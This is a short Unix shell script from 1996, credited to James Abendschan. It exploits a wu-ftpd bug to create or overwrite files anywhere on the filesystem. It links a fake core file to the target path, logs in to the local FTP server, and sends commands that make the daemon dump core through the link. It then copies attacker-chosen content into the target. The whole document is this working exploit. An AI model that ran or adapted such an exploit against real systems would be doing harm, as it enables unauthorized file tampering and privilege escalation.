#!/bin/sh
#
# exploit a bug in wu-ftpd to create a file anywhere on the filesystem
#  - files that already exist will be overwritten, but they won't
#    be writable.
#
# tested under Solaris 2.5
#
# James Abendschan  jwa@nbs.nau.edu  16 Oct 1996
#

if [ $# != 2 ]
then
 echo "usage: `basename $0` sourcefile dstfile"
 exit 1
fi

SRC=$1
TARGET=$2

USER=`whoami`
/usr/ucb/echo -n "Enter your password for localhost: "
read PASS

WDIR=/tmp/wu-ftpd-sploit.$USER
rm -rf $WDIR
mkdir $WDIR

ln -s $TARGET $WDIR/core

ftp -n localhost << _EOF_
quote user $USER
quote pass $PASS
cd $WDIR
user root woot
quote pasv
_EOF_

if [ ! -f $WDIR/core ]
then
 echo "Sorry, your ftpd didn't dump core."
 exit 1
fi

ls -l $WDIR/core
cp $SRC $TARGET
if [ $? != 0 ]
then
 echo "copy of $SRC to $TARGET failed."
 exit 1
fi

echo "Done; $SRC should now be $TARGET."

exit 0